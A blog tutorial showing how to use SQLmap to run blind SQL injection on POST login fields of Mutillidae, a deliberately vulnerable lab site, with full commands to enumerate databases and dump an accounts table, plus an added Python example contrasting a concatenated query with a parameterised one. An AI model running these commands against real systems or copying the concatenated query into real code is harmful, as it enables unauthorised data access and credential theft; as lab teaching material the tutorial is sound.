SQLMap: Blind SQL injection for POST vars
Source: http://www.omgsecurity.com/2009/06/blind-sql-injection-of-post-vars-with-sqlmap/
There are many How-To's on SQL injection, but I thought I would add to the list with a quick tutorial on how to use SQLmap to automate blind SQL injection on form POST variables. Most of the tutorials focus on injecting into GET variables within the URL.
List of tools used for this demonstration (configuration of these tools is outside the scope of this tutorial):

Running on Target System
- XAMPP (All-in-one Web Server and Database Server with PHP)
- Mutillidae (Purposely insecure PHP site created by Irongeek)

Running on Attacker's System
- Backtrack 4 Beta (Linux Distro for Pentesters)
- ParosProxy (Web proxy program for examining web traffic), installed on Backtrack 4
- SQLmap 0.6-rc5 (Automated SQL injection program), installed on Backtrack 4

Before you begin, make sure you have ParosProxy running and your web browser pointing to it.
The first thing we do is browse to the site. I will be testing the login form on the login.php page.
Before we login, let's look at the source code for the login form.
As you can see there are three input variables: user_name, password, and submit_button.
We also notice the method is POST (which is why we are using it for this example).
Now you can login. I will use the admin account to login. You could use any account though.
Username: admin
Password: adminpass
It isn't strictly necessary to log into the site, but I want to show you the POST variables as they are passed to the server within ParosProxy. Also, for this particular exercise, you will have to provide a valid username and password for the injection to work correctly in SQLmap, so you might as well make sure it works. Again, you don't have to use the admin account; you could even register a user first and then use that account.
And the page that tells me I have logged in successfully.
OK, now that we have successfully logged into the site, let's check Paros to see how that data was sent via the POST method.

As you can see, the format of the POST variables is as follows:

user_name=admin&password=adminpass&Submit_button=Submit

OK, now fire up sqlmap from a terminal. To make sqlmap check POST variables you need to specify the --method "POST" switch followed by the --data switch.

Here is the whole command for this example (notice how the POST data from Paros is supplied directly to the "--data" switch):

python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit"

It worked: sqlmap detected that the remote database server is MySQL ver. 5.X.X.

That is pretty much it, but just for fun let's enumerate some of the data. Let's check to see who the current user is:

python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --current-user

Alright! Running as root... that is convenient. Let's see the databases:

python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --dbs

OK, let's check out "owasp10", since that is the database for the Mutillidae website:

python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" --tables -D owasp10

Ooh, the "accounts" table looks interesting; let's get the data:

python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" -D owasp10 -T accounts --dump
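To show the application side of what sqlmap is probing for, here is an added example (not code from the original post, and not Mutillidae's own PHP): a minimal login check against an in-memory SQLite table, written once with the POST values concatenated into the SQL text and once with bound parameters. The table, its column names, and the O'Brien user are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the owasp10 'accounts' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("admin", "adminpass"), ("O'Brien", "pw")])
    return conn


def login_concat(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    # Assumed vulnerable pattern: POST values pasted straight into the SQL text.
    # A quote in either field changes the query's structure, so the server's
    # response (success, failure or error) depends on the input. That
    # observable difference is the oracle a blind injection tool keys on.
    sql = ("SELECT COUNT(*) FROM accounts WHERE username='" + user_name
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_param(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    # Hardened pattern: the SQL text is fixed and the values are bound as
    # parameters, so they are only ever compared as data, never parsed as SQL.
    sql = "SELECT COUNT(*) FROM accounts WHERE username=? AND password=?"
    return conn.execute(sql, (user_name, password)).fetchone()[0] > 0


def probe(login, user_name: str, password: str) -> str:
    """Run one login function on a fresh database; report 'ok', 'denied' or 'error'."""
    conn = make_db()
    try:
        return "ok" if login(conn, user_name, password) else "denied"
    except sqlite3.Error:
        return "error"
    finally:
        conn.close()


if __name__ == "__main__":
    for name, fn in (("concat", login_concat), ("param", login_param)):
        print(name, probe(fn, "admin", "adminpass"), probe(fn, "O'Brien", "pw"))
```

A perfectly legitimate username containing an apostrophe is enough to break the concatenated query, while the parameterised version logs that user in normally; the same fragility is what lets sqlmap treat the form as a true/false oracle.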
Well, there you have it. I hope you have found some of this tutorial interesting, and if you were curious about how to perform automated blind SQL injection on POST variables, perhaps this sheds a little light on it.